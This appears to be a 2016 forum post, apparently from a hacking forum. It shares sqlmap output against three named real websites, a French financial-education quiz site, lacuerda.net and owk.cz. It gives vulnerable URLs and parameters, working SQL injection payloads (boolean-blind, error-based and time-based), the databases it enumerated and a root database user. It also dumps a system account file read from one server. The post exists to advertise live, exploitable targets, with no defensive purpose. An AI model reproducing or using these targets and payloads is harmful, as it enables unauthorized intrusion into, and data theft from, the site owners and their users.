15.08.2016, 02:01
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
Current User: root@localhost
Код:
http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 2870=2870
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.5
Current DB: lafinancepourtousquiz
Data Base Found: information_schema
Data Base Found: grand_quiz
Data Base Found: lafinancepourtous
Data Base Found: lafinancepourtousgame
Data Base Found: lafinancepourtousquiz
Data Base Found: mysql
Data Base Found: performance_schema
Data Base Found: phpmyadmin
Data Base Found: portail
Data Base Found: preprod
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/home/mysql:/usr/sbin/nologin
admin:*:1001:1001:User &:/home/admin:/bin/sh
pgsql:*:70:70:PostgreSQL Daemon:/usr/local/pgsql/pgsql:/bin/sh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin
mailowner:*:1003:1003:User &:/home/mailowner:/usr/sbin/nologin
webapps:*:1004:1004:User &:/home/webapps:/sbin/nologin
mailman:*:91:91:Mailman Owner:/home/mailman:/sbin/nologin
nfrance:*:1006:1006:User &:/home/nfrance:/bin/sh
mrtg:*:279:1001:MRTG daemon:/nonexistent:/sbin/nologin
stats:*:1008:1009:User &:/home/stats:/sbin/nologin
nagios:*:181:181:Nagios pseudo-user:/var/spool/nagios:/sbin/nologin
dovenull:*:144:144:Dovecot login User:/var/empty:/usr/sbin/nologin
iefp2:*:1009:1010:utilisateur:/home/users/iefp2:/bin/ftponly
iefp3:*:1010:1011:utilisateur:/home/users/iefp3:/usr/local/bin/bash
mail1001:*:1011:1012:utilisateur:/home/users/mail1001:/usr/sbin/nologin
mail1005:*:1012:1013:utilisateur:/home/users/mail1005:/usr/sbin/nologin
mail1010:*:1013:1014:utilisateur:/home/users/mail1010:/usr/sbin/nologin
mail1015:*:1014:1015:utilisateur:/home/users/mail1015:/usr/sbin/nologin
mail1018:*:1016:1017:utilisateur:/home/users/mail1018:/usr/sbin/nologin
mail1020:*:1017:1018:utilisateur:/home/users/mail1020:/usr/sbin/nologin
mail1024:*:1018:1019:utilisateur:/home/users/mail1024:/usr/sbin/nologin
mail1026:*:1019:1020:utilisateur:/home/users/mail1026:/usr/sbin/nologin
mail1022:*:1020:1021:utilisateur:/home/users/mail1022:/usr/sbin/nologin
mail1029:*:1021:1022:utilisateur:/home/users/mail1029:/usr/sbin/nologin
mail1017:*:1022:1023:utilisateur:/home/users/mail1017:/usr/sbin/nologin
mail1025:*:1023:1024:utilisateur:/home/users/mail1025:/usr/sbin/nologin
mail1006:*:1024:1025:utilisateur:/home/users/mail1006:/usr/sbin/nologin
mail1003:*:1025:1026:utilisateur:/home/users/mail1003:/usr/sbin/nologin
mail1012:*:1026:1027:utilisateur:/home/users/mail1012:/usr/sbin/nologin
mail1027:*:1027:1028:utilisateur:/home/users/mail1027:/usr/sbin/nologin
mail1028:*:1028:1029:utilisateur:/home/users/mail1028:/usr/sbin/nologin
mail1002:*:1029:1030:utilisateur:/home/users/mail1002:/usr/sbin/nologin
mail1019:*:1030:1031:utilisateur:/home/users/mail1019:/usr/sbin/nologin
mail1030:*:1031:1032:utilisateur:/home/users/mail1030:/usr/sbin/nologin
mail1031:*:1032:1033:utilisateur:/home/users/mail1031:/usr/sbin/nologin
vnstat:*:284:284:vnStat Network Monitor:/nonexistent:/usr/sbin/nologin
current user: 'atame_@localhost'
Код:
http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET)
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=9 AND 7978=7978
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cid=9 AND SLEEP(5)
---
web application technology: Apache, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
available databases [4]:[*] information_schema[*] lc_comunidad[*] lc_dbase[*] lc_topsites
Код:
http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5266=5266
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
|
|
|